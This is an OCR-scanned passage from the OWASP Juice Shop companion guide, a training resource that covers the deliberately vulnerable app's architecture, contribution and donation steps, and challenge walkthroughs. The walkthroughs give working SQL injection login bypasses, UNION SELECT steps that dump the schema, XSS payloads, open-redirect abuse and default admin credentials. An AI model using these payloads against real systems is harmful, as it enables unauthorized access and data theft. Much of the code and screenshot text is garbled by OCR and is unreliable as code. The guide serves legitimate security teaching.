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Similar to the Generated AP! endpoints, not all hand-written endpoints can be 
used anonymously. The upcoming section Access control on routes explains the 
available authorization checks. 


Unit tests for hand-written routes can be found in the test/server folder. These 
tests are written using the Chai assertion library in conjunction with the Mocha 
test framework. 


Access control on routes 


For both the generated and hand-written middleware access can be retricted on 
the corresponding routes by adding insecurity.denyAll() Or 

insecurity. isAuthorized() as an extra middleware. Examples for denying all 
access to certain HTTP verbs for the securityquestion and SecurityAnswer 
models: 





/* SecurityQuestions: Only GET list of questions allowed. */ 


app.post('/api/SecurityQuestions', insecurity.denyAll()) 
app.use('/api/SecurityQuestions/:id', insecurity.denyAll()) 


/* SecurityAnswers: Only POST of answer allowed. */ 
app.get('/api/SecurityAnswers', insecurity.denyAll()) 
app.use('/api/SecurityAnswers/:id', insecurity .denyAll()) 


The following snippet show the authorization settings for the user model which 
allows only post to anonymous users (for registration) and requires to be logged- 
in for retrieving the list of users or individual user records. Deleting users is 
completely forbidden: 


app.get('/api/Users', insecurity.isAuthorized()) 
app.route('/api/Users/:id') 
.get(insecurity.isAuthorized()) 





.put(insecurity.denyAl1()) // 
.delete(insecurity.denyAl1()) // D 


iden to make the password chan 





den entirely to keep login 


> 


Custom libraries 


Two important and widely used custom libraries reside in the 1ib folder, one 
containing useful utilities ( 1ib/utils.js ) and the other encapsulating many of the 
broken security features ( lib/insecurity.js ) of the application. 


Useful utilities 


The main responsibility of the utils.js module is setting challenges as solved 
and sending associated notifications, optionally including a CTF flag code. It can 
also retrieve any challenge by its name and check if a passed challenge is not yet 
solved, to avoid unnecessary (and sometimes expensive) repetitive solving of the 
same challenge. 
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exports.solve = function (challenge, isRestore) { 
const self = this 
challenge.solved = true 
challenge.save().then(solvedChallenge => { 
solvedChallenge.description = entities.decode(sanitizeHtml(solvedChallenge.descrir 
allowedTags: [], 
allowedAttributes: [] 
H») 


console.log(colors.green('Solved') + ' challenge 


+ colors.cyan(solvedChallenge.r 
self.sendNotification(solvedChallenge, isRestore) 


H» 


exports.sendNotification = function (challenge, isRestore) { 
if (!this.notSolved(challenge)) { 
const flag = this.ctfFlag(challenge.name) 
const notification = { 


name: challenge.name, 


challenge: challenge.name + ' (' + challenge.description + ')', 


flag: flag, 
hidden: !config.get(' application. showChallengeSolvedNotifications'), 
isRestore: isRestore 


} 


notifications.push(notification) 
if (global.io) { 
global.io.emit('‘challenge solved’, notification) 


It also offers some basic string and pate utilities along with data (un-)wrapper 
functions and a method for the synchronous file download used during 
Customization. 


Insecurity features 


The insecurity.js module offers all security-relevant utilities of the application, 
but of course mostly in some broken or flawed way: 


e Hashing functions both weak ( hash) ) and relatively strong ( hmac() ) 

e Route authorization via JWT with denyall() and isAuthorized() (See Access 
control on routes) and corresponding grant of permission for a users with 
authorize() 

e HTML sanitization by exposing a (vulnerable) external library as function 
sanitizeHtml() 

e Keeping a bi-directional map of users with their current authentication token 
(JWT) in authenticatedUsers 

e Coupon code creation and verification functions generatecoupon() and 
discountFromCoupon() 

e Awhitelist of allowed redirect URLs and a corresponding check function 
isRedirectAllowed() 

e CAPTCHA verification via verifycaptcha() which compares the user's answer 
against the requested CAPTCHA from the database 
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Storage Tier 


SQLite and MarsDB form the backbone of the Juice Shop, as an e-commerce 


application without storage for its product, customer and associated data would 


not be very realistic. The Juice Shop uses light-weight implementations on the 


database layer to keep it runnable as a single "all-inclusive" server which can be 


deployed in various ways with ease. 
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Database 


For the main database of the Juice Shop the file-based SQLite engine is used. It 
does not require a separate server but is accessed directly from 


data/juiceshop.sqlite on the file system of the Node.js server. For ease of use 


and more flexibility the relational mapping framework Sequelize is used to actually 


access the data through a querying API. Sometime plain SQL is used as well, and 


of course in an unsafe way that allows Injection. 


Data model 


The relational data model of the Juice Shop is very straightforward. It features the 


following tables: 


Users which contains all registered users (i.e. potential customers) of the 
web shop. 
The table securityQquestions contains a fixed number of security questions a 
user has to choose from during registration. The provided answer is stored in 
the table SecurityAnswers . 
The Products table contains the products available in the shop including 
price data. 
When logging in every user receives a shopping basket represented by a row 
in the Baskets table. When putting products into the basket this is reflected 
by entries in BasketItems linking a product to a basket together with a 
quantity. 
Users can interact further with the shop by 
o giving feedback which is stored in the Feedbacks table 
o complaining about recent orders which creates entries in the complaints 
table 
o asking for fruit-pressing leftovers to be collected for recycled via the 
Recycles table. 
The table captchas stores all generated CAPTCHA questions and answers 
for comparison with the users response. 
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e The Challenges table would not be part of the data model of a normal e- 
commerce application, but for simplicities sake it is kept in the same schema. 
This table stores all hacking challenges that the OWASP Juice Shop offers 
and persists if the user already solved them or not. 


Bid 
question 
g At 
$5 updatedAt 


= name 3 1 F quantity 


E IB address 


FE createdAt F 
F Userid i e JE updatedAt =| | FẸ SecurityQuestiontd 
 Userid 


ketid 
Fj Productid 


SS createaat 
FE updatedat 


EE updatedat 





Non-relational database 


Not all data of the Juice Shop resides in a relational schema. The product 
reviews are stored in a non-relational in-memory MarsDB instance. An example 
user reviews entry might look like the following inside MarsDB: 


un "an oon 


{"message":"One of my favorites!","author":"admin@juice-sh.op", "product":1,"_id":"PaZ- 


> 


All interaction with MarsDB happens via the MongoDB query syntax. 


Populating the databases 


The OWASP Juice Shop comes with a data/datacreator.js module that is 
automatically executed on every server start after the SQLite file and in-memory 
MarsDB have been cleared. It populates all tables with some initial data which 
makes the application usable out-of-the-box: 
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module.exports = async () => { 

const creators = [ 
createUsers, 
createChallenges, 
createRandomFakeUsers, 
createProducts, 
createBaskets, 
createBasketItems, 
createFeedback, 
createComplaints, 
createRecycles, 
createSecurityQuestions, 
createSecurityAnswers 


] 


for (const creator of creators) { 
await creator() 
} 
} 


For the users and Challenges tables the rows to be inserted are defined via 
YAML files in the data/static folder. As the contents of the products table and 
the non-relational reviews collection can be customized, it is populated based on 
the active configuration file. By default this is config/default.yml ). 


The data in the Feedbacks , SecurityQuestions , SecurityAnswers , Basket , 

BasketItem , Complaints and Recycles tables is statically defined within the 
datacreator.js script. They are so simple that a YAML declaration file seemed like 
overkill. 


The captchas table remains empty on startup, as it will dynamically generate a 
new CAPTCHA every time the Contact us page is visited. 


File system 


The folder ftp contains some files which are directly accessible. When a user 
completes a purchase, an order confirmation PDF is generated and placed into 
this folder. Other than that the ftp folder is also used to deliver the shop's terms 
of use to interested customers. 


Uploaded complaint files 


The File complaint page contains a file upload field to attach one of the previously 
mentioned order confirmation PDFs. While these are really uploaded to the 
server, they are not written to the file system but discarded for security reasons: 
Publicly hosted Juice Shop instances are not supposed to be abused as malware 
distribution sites or file shares. 


End-to-end tests 
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As applications grow in size and complexity, it becomes unrealistic to rely 
on manual testing to verify the correctness of new features, catch bugs and 
notice regressions. Unit tests are the first line of defense for catching bugs, 
but sometimes issues come up with integration between components which 
can't be captured in a unit test. End-to-end tests are made to find these 
problems.” 





The folder test/eze contains an extensive suite of end-to-end tests which 
automatically solves every challenge in the Juice Shop application. Whenever 
a new challenge is added, a corresponding end-to-end test needs to be included, 
to prove that it can be exploited. 


It is quite an impressive sight to see how 88 hacking challenges are solved 
without any human interaction in a few minutes. The e2e tests constantly jump 
back and forth between attacked pages and the Score Board letting you watch as 
the difficulty stars and progress bar slowly fill and ever more green "solved"- 
badges appear. There is a video recording of this on YouTube for the 7.0.0 
release of the Juice Shop. 





OWASP Juice Shop 7.0.0 - Protractor test suite 


43 Aufrufe 


+ Björn Kimminich VIDEO BEARBEITEN 
t Am 08.03.2018 veröffentlicht 


These tests are written and executed with Protractor which uses Selenium 
WebDriver under the hood. 

1, https://angular.io/guide/architecture-services + 
. https://angular.io/guide/architecture-components + 
3, https://angular.io/guide/template-syntax e 
a http://expressjs.com/en/starter/basic-routing.html © 


5, https://docs.angularjs.org/guide/e2e-testing - 
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Helping with translations 


The user interface of OWASP Juice Shop is fully translated into several 
languages. For many more languages there is a partial translation available: 


WB OWASP Juice Shop @ œm meiss womelate 1m Suomalainen A Q Parts ermine 


I Français 
eR gag BE 336 
awd 


Apple Juice (1000ml) The all-time classic. nm" 
Aee Finest pressings of apples. Allergy disclaimer: Might contain traces of worms. 
Can be for recycling. 


Since release v9.1.0 translation of backend strings such as product names & 





descriptions, challenge descriptions and hints as well as security questions is also 
supported. 


As long as the original author is taking part in the project's maintenance, there will 
always be English and a complete German translation available. Everything 
beyond that depends on other volunteer translators! 


Crowdin 


Juice Shop uses a Crowdin project to translate the project and perform reviews: 
https://crowdin.com/project/owasp-juice-shop 


Crowdin is a Localization Management Platform that allows to crowdsource 
translations of mobile apps, web, desktop software and related assets. It is free 
for open source projects. | 


How to participate? 


1. Create an account at Crowdin and log in. 

2. Visit the project invitation page htips://crowdin.com/project/owasp-juice- 
shop/invite 

3. Pick a language you would like to help translate the project into 
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(Estar OwnProject Explore 2) © | tein | ESE 


ea 


BB Bjorn Kimminich 


OWASP Juice Shop 


Home Activity Discussions 


Translations: 


Description 


se O w E = 


nese Simplified Chinese tionai Czech Danish 





Details 


= + il + = 


Estonian Finnish French Georgian 





—_— = = Managers 
z : — iD j 
— emme Björn Kimminich (bkimminich) 
Hebrew Hind Hungarian indonesian Italian a (Gay Contact 


— = ‘= 


4. In the Files tab select the one of the two listed en.json source files, i.e. 
/frontend/src/assets/i18n/en.json for the Ul texts or /data/static/i18n/en. json 
for the product, challenge & security questions strings. 

5. Pick an untranslated label (marked with a red box) and provide a translation 

6. That is all it takes! 


In the background, Crowdin will use the dedicated 11@n_develop Git branch to 
synchronize translations into the app/i1sn/??.json language files where >? isa 
language code (e.g. en or de). 


Adding another language 


If you do not find the language you would like to provide a translation for in the 
list, please contact the OWASP Juice Shop project leader or raise an issue on 
GitHub asking for the missing language. It will be added asap! 


Translating directly via GitHub PR 


1. Fork the repository https://github.com/bkimminich/juice-shop 

2. Translate the labels in the desired language- .json file in 
/frontend/src/assets/i18n OF /data/static/i18n 

3. Commit, push and open a Pull Request 

4. Done! 
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If the language you would like to translate into is missing, just add a 
corresponding |SO-code- .json file to the folders /frontend/src/assets/i18n and 
/data/static/i1gn . It will be manually imported to Crowdin afterwards and added 
as a new language there as well. 


The Crowdin process is the preferred way for the project to handle its 
translations as it comes with built-in review and approval options and is very 
easy to use. But of course it would be stupid of us to turn down a translation just 
because someone likes to edit JSON files manually more! Just be aware that this 
is causing extra effort for the core maintainers of the project to get everything 
"back in sync". 


1, https://crowdin.com/ e 
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Donations 


As a project of the OWASP Foundation the Juice Shop is and always will be 


e open source 
e free software 


The entire project is licensed under the liberal MIT license which allows even 
commercial use and modifications. There will never be an "enterprise" or 
"premium" version of OWASP Juice Shop either. 


This does not mean that a project like it can thrive without any funding. Some 
examples on what the OWASP Juice Shop spent (or might spend) money on: 


e Giveaways for conferences and meetups (e.g. stickers, magnets, iron-ons or 
temporary tattoos) 

e Merchandise to reward awesome project contributions or marketing for the 
project (e.g. apparel or mugs) 

e Bounties on features or fixes (via Bountysource) 

e Software license costs (e.g. an extended icon library) 

e Commercial support where the team lacks expertise (e.g. graphics design for 
this book's cover was paid from donations) 


How can I donate? 


The project gratefully accepts donations via PayPal or Credit Card: 


Provider Link 


Paypal ae) 


Credit https://www.regonline.com/Register/Checkin.aspx? 
Card EventID=1044369 


All donations are received and managed by the OWASP Foundation and must be 
earmarked properly to end up in the Juice Shop budget. You will receive an official 
donation receipt. 


@ Independent of your selected method it is recommended to forward your 
donation confirmation to bjoern.kimminich@owasp.org to allow verifying if the 
earmarking worked and the money is attributed to the Juice Shop budget. You 
should provide your full name and (optional) URL for the mention in the 
Acknowledgements on the official project page. If you donated at least 1000 US$ 
you can choose to provide a logo to put on the page instead of your name. See 
Sponsorship Rules below for details. 


Credit card donation step-by-step 


1. Go to https://www.regonline.com/Register/Checkin.aspx?EventID=1044369. 
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2. Register with your email address and select Project supporter from the 
Donation Type dropdown list. 


The Open Web Application Security Project 
OWASP Foundation Donation 


United States 
Phone: 301-275-9403 EF Email Us 





View Your Existing Registration 
Start Your Registration 
* Email Address: bjoern.kimminich@owasp.org 
* Donation Type v 
Chapter Supporter 


Project Supporter 
Foundation Donor 











3. Continue to the Personal Info step and fill at least all mandatory fields. Click 
Continue. 

4. In the Agenda step select one of the available amounts or Project Supporter - 
Other to put in an individual amount. 

5. Enter owasP Juice Shop Project into the mandatory field Which Project would 
you like to support? and click Continue. 


Agenda 


Platinum Project Supporter 
Price: $250.00 


Gold Project Supporter 
Price: $100.00 


Silver Project Supporter 
Price: $20.00 


W) Project Supporter - Other 
$|10 Project Donation Amount 
OWASP Juice Shop Project * Which Project would you like to support? 


Total: I 








6. In the final Checkout step choose a Password for your account and fill in your 
_ Billing Information. 

7. Click Finish to process your donation and be led to the Confirmation screen. 

8. Here you can download your Receipt under the Documents section on the 
right. 
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Personal Info Agenda Checkout Confirmation 
I 


Invite Your Friends Send an Email Tweet About It 


*** FORWARD THIS TO THE CHAPTER/PROJECT LEADER AS PROOF OF PAYMENT*** 





Personal Info 








Actions 
Registration ID: F A Mobile Event Guide 
Registrant: Bjoern Kimminich a Print Your Registration 
Germany 
Registration Date: 11/19/2017 11:32 PM Documents 


Donation: Project Supporter 

Status: Confirmed @ Receipt 
Work Phone: +49 PIi 

Email: bjoern.kimminih@owasp.org 











Sponsorship Rules 


OWASP Juice Shop adheres to the Project Sponsorship Operational Guidelines 
of the OWASP Foundation. In one sentence, these allow named 
acknowledgements (with link) for all monetary donations. For amounts of least 
1000 US$ a logo image (with link) can be added instead. The logo size can be at 
most 300x300 pixels. Logo and name placements are guaranteed for 1 year after 
the donation but might stay there longer at the discretion of the Project Leader. 


You can find a list of all sponsors of the OWASP Juice Shop to date in the 
Acknowledgements tab of the project homepage. 
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Challenge solutions 


All URLs in the challenge solutions assume you are running the application locally 
and on the default port http://localhost:3000. Change the URL accordingly if you 
use a different root URL. 


Often there are multiple ways to solve a challenge. In most cases just one 
possible solution is presented here. This is typically the easiest or most obvious 
one from the author's perspective. 


The challenge solutions found in this release of the companion guide are 
compatible with v9.1.0 of OWASP Juice Shop. 


x Challenges 


Access a confidential document 


1. Follow the link to titled Check out our boring terms of use if you are interested 
in such lame stuff (http://localhost:3000/ftp/legal.md) on the About Us page. 

2. Successfully attempt to browse the directory by changing the URL into 
http://localhost:3000/ftp 


~I ftp 
(=) quarantine acquisitions.md coupons_2013.md.bak 
eastere.gg incident-support. kdbx legal.md 
package .json.bak suspicious_errors.yml 


3. Open hittp://localhost:3000/ftp/acquisitions.md to solve the challenge. 


Provoke an error that is neither very gracefully nor 
consistently handled 


Any request that cannot be properly handled by the server will eventually be 
passed to a global error handling component that sends an error page to the 
client that includes a stack trace and other sensitive information. The restful API 
behaves in a similar way, passing back a JSON error object with sensitive data, 
such as SQL query strings. 


Here are two examples (out of many different ways) to provoke such an error 
situation and solve this challenge immediately: 


e Visit http://localhost:3000/rest/qwertz 
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OWASP Juice Shop (Express ~4.16.4) 


500 Error: Unexpected path: /rest/qwertz 
at /app/routes/angularjs:10:12 
at Layer.handle [as handle_request] (/app/node_modules/express/lib/router/layer.js:95:5) 
at trim_prefix (/app/node_modules/expressilib/router/index js:317:13) 
at /app/node_modules/expressilib/router/index js:284:7 
at Function process_params (/app/node_modules/exprass/lib/router/index js:335:12) 
at next (/app/node_modules/expressilib/router/index js:275:10) 
at /app/routes/verifyjs:137:3 
at Layer handle [as handle_request] (/app/node_modules/express/libirouter/layerjs:95:5) 
at trim_prefix (/app/node_modules/expressilib/routerlindex js:317:13) 
at /app/node_modules/express/lib/router/index js.284:7 
at Function process_params (/app/node_modules/express/lib/router/index js:335:12) 
at next (/app/nade_modules/express/lib/router/index js-275:10) 
at /app/routes/verifyjs 77:3 
at Layer handle [as handle_request] (/app/node_modules/express/lib/router/layerjs:95:5) 
at trim_prefix (/app/node_modules/expressilib/routerlindex js-317°13) 
at /app/node_modules/expressilib/router/index js:284:7 
at Function.process_params (/app/node_modules/express/lib/router/index js:335:12) 
at next (/app/node_modules/express/lib/router/indox js:275:10) 
at logger (/app/node_modules/morganiindex.js:144:5) 
at Layer-handle [as handle_request] (/app/node_modules/express/lib/router/layerjs:95:5) 
at trim_prefix (/app/node_modules/expressilib/routerlindex js.317:13) 
at /app/node_modules/expressilib/router/index js:284:7 
at Function.process_params (/app/node_modules/express/lib/router/index Js:335:12) 
at next (/app/node_modules/expressilib/router/index js:275:10) 
at jsonParser (/app/serverjs:144:3) 
at Layer handle [as handle_request] (/app/node_modules/express/lib/router/layer.js:95:5) 
at trim_prefix (/app/node_modules/expressilib/routeriindex js:317°13) 
at /app/node_modules/expressilib/router/index js:284:7 


e Log in to the application with ' (single-quote) as Email and anything as 
Password 


A Login G Log in with Google 


C] Remember me 








© Failed to load resource: the server responded with a status of 560 (Internal Server Error) Lrest/user/login:1 
ve 
verror: 
verror: 


message: "SQLITE_ERROR: unrecognized token: "47bce5c74f589f4867dbd57e9ca9f808"" 
name: "SequelizeDatabaseError” 
'SQLITE_ERROR’ 








“SELECT * FROM Users WHERE emai * AND password = *47bce5c74f589f4867dbd57e9ca9f808""} 
ELECT * FROM Users WHERE email = ''' AND password = '47bce5c74#589F4867dbd57e9ca9f808'"} 
“SELECT * FROM Users WHERE email * AND password = '47bce5c74f589f4867dbd57e9ca9f808'" 

“SequelizeDatabaseError: SQLITE_ERROR: unrecognized token: “47bceSc74f589F4867dbdS7e9ca9f8es"4 at Query.formatError (/app/node_modu. 
>» _proto_: Object 

__: Object 

{normalizedNames: Map(@), lazyUpd 
message: “Http failure response for https: // 
name: "HttpErrorResponse” 

ok: false 

status: 500 

statusText: “Internal Server Error" 

url: "https: //juice-shop-staging. herokuapp.com/rest/user/login” 
> to__: Object 











ull, lazyInit: f} 
ice-shop-staging.herokuapp.com/rest/user/login: 5@@ Internal Server Error” 











>| 


Read our privacy policy 


1. Log in to the application with any user. 

2. Open the dropdown menu on your profile picture and choose Privacy & 
Security. 

3. You will find yourself on http://localhost:3000/#/privacy-security/privacy-policy 
which instantly solves this challenge for you. 


Let us redirect you to one of our crypto currency 
addresses 
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1. Log in to the application with any user. 

2. Visit the Your Basket page and expand the Payment and Merchandise 
sections with the "credit card"-button. 

3. Perceive that all donation links are passed through the to parameter of the 
route /redirect 

4. Open main.js in your browser's DevTools 

5. Searching for /redirect?to= and stepping through all matches you will notice 
three functions that are called only from hidden buttons on the Your Basket 
page: 


> 
1.prototype.showBitcoinQrCode = function() { 
this.dialog.open(jl, { 
data: { 
data: “bitcoin: 1AbKfgvw9psQ41NbLi8kufDQTezwG8DRZm", 
url: "/pedirect?toshttps: //blockchain.info/address/1AbKfgvw9psQ41NbLi8kufDQTezwG8DRZm" , 
address: "1AbKfgvw9psQ41NbLi8kufDQTezwG8DRZm" , 
title: "TITLE_BITCOIN_ADDRESS” 


š 
5 


}) 
} 
2 
1. prototype. showDashQrCode = function() { 
this.dialog.open(jl, { 
data: { 
data: "dash:Xr556RzuwX6hg5EGpkybbv5RanJoZN17kw", 
urli" ttps://explorer.dash.org/address/Xr556RzuwX6hg5EGpkybbv5RanJoZN17kW" , 
address: "Xr556RzuwX6hg5EGpkybbv5RanJoZN17kW", 
title: "TITLE_DASH_ADDRESS" 
$ 
H» 


} 


> 
l.prototype.showEtherQrCode = function() { 


5 


this.dialog.open(jl, { 
data: { 
data: "@x@F933ab9FCAAA782D0279C300D73750e1311EAE6", 
url: “/pedirect?toshttps://etherscan.io/address/@x0f933ab9fcaaa782d0279c300d73750e1311eae6", 
address: "@x@f933ab9FCAAA782D0279C300D73750e1311EAE6", 
title: "TITLE_ETHER_ADDRESS" 
} 
}) 
} 


6. Open one of the three, e.g. http://localhost:3000/redirect? 
to=https://blockchain.info/address/1AbKfgvw9psQ41NbLi8kufDQTezwG8DRZ 
m to solve the challenge. 


Follow the DRY principle while registering a user 


1. Go to http://localhost:3000/#/register. 

2. Fill out all required information except the Password and Repeat Password 
field. 

3. Type e.g. 12345 into the Password field. 

4. Now type 12345 into the Repeat Password field. While typing the numbers 
you will see a Passwords do not match error until you reach 12345 . 

5. Finally go back to the Password field and change it into any other password. 
The Repeat Password field does not show the expected error. 

6. Submit the form with Register which will solve this challenge. 


Find the carefully hidden 'Score Board" page 


1. Go to the Sources tab of your browsers DevTools and open the main.js file. 

2. If your browser offers pretty-printing of this minified messy code, best use this 
offer. In Chrome this can be done with the "{}"-button. 

3. Search for score and iterate through each finding to come across one that 
looks like a route mapping section: 
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[E mainis  mainjsformatted X ic] 


y-print this minified file? more never show X 





w$ 2 
path: "about", 
component: DL 


b 
path: "basket", 
component: en 


path: "contact", 
component: xn 


7 “path: "change-password", 
component: Fn 


path: "complain", 
component: Gn 


path: "login", 
component: de 


Lh 
path: “forgot-password”, 
component: Re 


b 
path: "recycle", 
component: qe 


path: "register", 
component: nt 


path: "search", 
component: Et 


path: "BEORS-board", 


component: Kt 





bi 


path: "track-order", 
component: mu 


path: "track-result", 
component: 
h 
matcher: _a, 
data: ba. 
component: Pu 


matcher: Ca, ~ 





scord 


Line $521, Column 20 


av| aa * Cancel 


4. Navigate to http://localhost:3000/#/score-board to solve the challenge. 
5. From now on you will see the additional menu item Score Board in the 
navigation bar. 


Perform a reflected XSS attack 


1. Log in as any user. 

2. Click the Track Orders button. 

3. Paste the attack string <iframe src="javascript:alert( xss`)"> into the Order 
ID field. 

4. Click the Track button. 

5. An alert box with the text "xss" should appear. 


LEOA: Auf einer in dieser Seite eingebetteten Seite wird Folgendes English 
angezeigt 


XSS 


Order ID 


<iframe src="javascript-alert(xss )"> 


@ Track 





Perform a DOM XSS attack 


1. Paste the attack string <iframe src="javascript:alert( xss°)"> into the 
Search... field. 

2. Click the Search button. 

3. An alert box with the text "xss" should appear. 
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Auf einer in dieser Seite eingebetteten Seite wird Folgendes 
angezeigt 


XSS 


All Products 


Image Product 


Items perpage: 10 v 





Exfiltrate the entire DB schema definition via SQL 
Injection 


1. From any errors seen during previous SQL Injection attempts you should 
know that SQLite is the relational database in use. 

2. Check https://www.sqlite.org/faq.html to learn in "(7) How do | list all 
tables/indices contained in an SQLite database" that the schema is stored in 
a system table sqlite_master . 

3. You will also learn that this table contains a column sqi_ which holds the text 
of the original CREATE TABLE Or CREATE INDEX Statement that created the table 
or index. Getting your hands on this would allow you to replicate the entire 
DB schema. 

4. During the Order the Christmas special offer of 2014 challenge you learned 
that the /rest/products/search endpoint is susceptible to SQL Injection into 
the q parameter. 

5. The attack payload you need to craft is a unton sELEcT merging the data from 
the sqlite_master table into the products returned in the JSON result. 

6. As a starting point we use the known working '))-- attack pattern and try to 
make a unton seLecT out of it 

7. Searching for ‘)) UNION SELECT * FROM x-- fails with a SQLITE_ERROR: no such 
table: x as you would expect. 

8. Searching for ')) UNION SELECT * FROM sqlite_master-- fails with a promising 
SQLITE_ERROR: SELECTs to the left and right of UNION do not have the same number 
of result colums which least confirms the table name. 

9. The next step ina unzon seLecT -attack is typically to find the right number of 
returned columns. As the Search Results table in the UI has 3 columns 
displaying data, it will probably at least be three. You keep adding columns 
until no more sQLITE_ERROR occurs (or at least it becomes a different one): 


i. ')) UNION SELECT '1' FROM sqlite_master-- fails with number of result 
columns error 

ii. ')) UNION SELECT '1', '2' FROM sqlite_master-- fails with number of result 
columns error 

iii, ‘)) UNION SELECT '1', '2', '3' FROM sqlite_master-- fails with number of 
result columns error 

iv. (...) 

V. ')) UNION SELECT '1', '2', '3', '4', '5', '6', '7', '8' FROM sqlite_master-- 


Still fails with number of result columns error 
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Vi. EN UNTON SELEG Yat ou Sah Va ous v6 78 vel G4 FROM 
sqlite_master-- finally gives you a JSON response back with an extra 
element 
{"id":"1","name":"2","description":"3","price":"4","deluxePrice":"5","image": 
"6", "createdAt":"7","updatedAt":"8","deletedAt":"9"} . 

10. Next you get rid of the unwanted product results changing the query into 
something like qwert')) UNION SELECT '1', '2', '3', '4', '5', '6', '7', '8', ‘9° 


FROM sqlite_master-- leaving only the " unzon ed" element in the result set 


11. The last step is to replace one of the fixed values with correct column name 
sql , which is why searching for qwert')) UNION SELECT sql, '2', '3', '4', ‘5’, 
'6', '7', '8', '9' FROM sqlite_master-- solves the challenge. 


Give a devastating zero-star feedback to the store 


Place an order that makes you rich. Visit the Contact Us form and put ina 
Comment text. Also solve the CAPTCHA at the bottom of the form. 


1. The Submit button is still disabled because you did not select a Rating yet. 

2. Inspect the Submit button with your DevTools and note the disabled attribute 
of the <button> HTML tag 

3. Double click on disabled attribute to select it and then delete it from the tag. 


Ë o sa Q @ 


ne ContactUs Wa Your Basket 3= ~ 


Contact Us 





div 
‘ubmitButton” mat-ratsed-button style="margin-top:5px;" type="submit" class= "nat= 


a-1g” aria-hidden="true” data-prefix="fas” data-icon- 
@ @ 512 512" data-fa-i2svg>..</svg: 


4. The Submit button is now enabled. 

5. Click the Submit button to solve the challenge. 

6. You can verify the feedback was saved by checking the Customer Feedback 
widget on the About Us page. 
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Customer Feedback 


Zero Stars! (null) 


Follow us on Social Media 


W Twitter Ej Facebook @ Slack Press Kit 





xx Challenges 


Access the administration section of the store 


1. Open the main.js in your browser's developer tools and search for "admin". 
2. One of the matches will be a route mapping to path: "administration" . 








Rd) E Console Network Sources Application Audits Memory Performance Security 
Page Toggle d: 14 mainjs mainjsformatted X e 
"O top © Pretty-print this minified file? more never show X 


Y © localhost:3000 
» [i assets/public/images 


return e.reverse().map(function(1, n) { a“ 
return String.fromCharCode(1 - t - 45 - n) 


D inde) }).Join("") 
}(25, 184, 174, 179, 182, 186) + 36669. .toString(36).toLowerCase() + function() { 
Bh mainjs for (var 1 = [], n = ð; n < arguments. length; n++) 
Bh polyñiisjs [n] = argunents[n]; 
var e = Array. prototype. slice. call (arguments) 
Bh runtimejs » t = e.shift(); 
BB vendorjs return e.reverse().map(function(1, n) { 
B styleccss return String.fromcharCode(1 - t - 24 - n) 
).join("") 
Bi obsvg X13, 144, 87, 152, 139, 144, 83, 138) + 10. .toString(36).toLowercase()) ? { 
nee consumed: 1 
B sso }: null 
> © cdnjs.cloudflare.com f 
+ © fonts.googleapis.com ae.n.forRoot: 
path: " stration", 
component: U 
{ 


path: "about", 
component: D1 
{ 


path: “basket”, 
Component: nn 
Lt 





3. Navigating to http://localhost:3000/#/administration will give a 403 Forbidden 
error. 
4. Log in to an administrator's account by solving the challenge 
o Log in with the administrator's user account or 
o Log in with the administrator's user credentials without previously 
changing them or applying SQL Injection first and then navigate to 
http://localhost:3000/#/administration will solve the challenge. 


View another user's shopping basket 


1. Log in as any user. 

2. Put some products into your shopping basket. 

3. Inspect the Session Storage in your browser's developer tools to find a 
numeric bid value. 
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[k á] Elements Console Application » Al : X 
Ø Clear storage a | Key Value 
bid 1 





== http://localhost:3000 


IndexedDB 


Web SQL 
¥ ® Cookies 
® http://localhost:3000 
>| G X 
4. Change the bid , e.g. by adding or subtracting 1 from its value. 
5. Visit http://localhost:3000/#/basket to solve the challenge. 


If the challenge is not immediately solved, you might have to Fs -reload to relay 
the bia change to the Angular client. 


Use a deprecated B2B interface that was not properly 
shut down 


1. Log in as any user. 

2. Click Complain? in the Contact Us dropdown to go to the File Complaint form 

3. Clicking the file upload button for Invoice and browsing some directories you 
might notice that .pdf and .zip files are filtered by default 

4. Trying to upload another other file will probably give you an error message on 
the UI stating exactly that: Forbidden file type. Only PDF, ZIP allowed. 

5. Open the main.js in your DevTools and find the declaration of the file upload 
(e.g. by searching for zip ) 

6. In the allowedMimeType array you will notice “application/xml" and "text/xml" 
along with the expected PDF and ZIP types 





mt 
serService = 1, 
complaintService = n, 
merControl = new T.e({ 








essageControl = new T.e("",[T.o.required, T.o.maxLength(16@)]), 
‘ileUploaderror = e, 







rage .getItem("token™) peen cJ cig 
", "application/xml", "text/xml", “application/zig”, “application/x-Zig-compressed”, “multipart/x-Zig"], 





allowedMimetype: 
maxFileSize: 1e5 


})» 
this.userEmail = void @, 
this.complaint = void @ 


7. Click on the Choose File button. 
8. In the File Name field enter *.xm1 and select any arbitrary XML file (<100KB) 
you have available. Then press Open. 
9. Enter some Message text and press Submit to solve the challenge. 
10. On the JavaScript Console of your browser you will see a suspicious 410 
(Gone) HTTP Error. In the corresponding entry in the Network section of your 
browser's DevTools, you should see an error message, telling you that 828 


customer complaints via file upload have been deprecated for security reasons! 


180 


Get rid of all 5-star customer feedback 


1. Log in to the application with any user. 
2. Solve Access the administration section of the store 


Customer Feedback 


Comment 


I love this shop! 
Best products in 
town! Highly 
recommended! 


Great shop! 
Awesome service! 


Incompetent 
customer support! 
Can't even upload 
photo of broken 
purchase! 

Support Team: 
Sorry, only order 
confirmation PDFs 
can be attached to 
complaints! 


This is the store for 
awesome stuff of 
all kinds! 


Never gonna buy 
anywhere else from 
now on! Thanks for 
the great service! 





3. Delete all entries with five star rating from the Customer Feedback table 
using the trashcan button 


Log in with the administrator's user account 


e Login with Email ' or 1=1-- and any Password which will authenticate the 
first entry in the users table which coincidentally happens to be the 
administrator 

e orlogin with Email admin@juice-sh.op'-- and any Password if you already 
know the email address of the administrator 

e orlogin with Email admin@juice-sh.op and Password admin123 if you looked 
up the administrator's password hash _ @192023a7bbd73250516fe69df18b5ee ina 
rainbow table after harvesting the user data 

o by solving Retrieve a list of all user credentials via SQL Injection 
o or via REST API call http://localhost:3000/api/Users while providing any 
valid Authorization Bearer token (even one of a self-registered user). 


Log in with MC SafeSearch's original user credentials 
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1. Reading the hints for this challenge or googling "MC SafeSearch" will 
eventually bring the music video "Protect Ya' Passwordz" to your attention. 

2. Watch this video to learn that MC used the name of his dog "Mr. Noodles" as 
a password but changed "some vowels into zeroes". 

3. Visit http://localhost:3000/#/login and log in with Email mc.safesearch@juice- 
sh.op and Password mr. needles to solve this challenge. 


Log in with the administrator's user credentials 
without previously changing them or applying SQL 
Injection 


1. Visit http://localhost:3000/#/login. 
2. Log in with Email admin@juice-sh.op and Password admin123 which is as easy 
to guess as it is to brute force or retrieve from a rainbow table. 


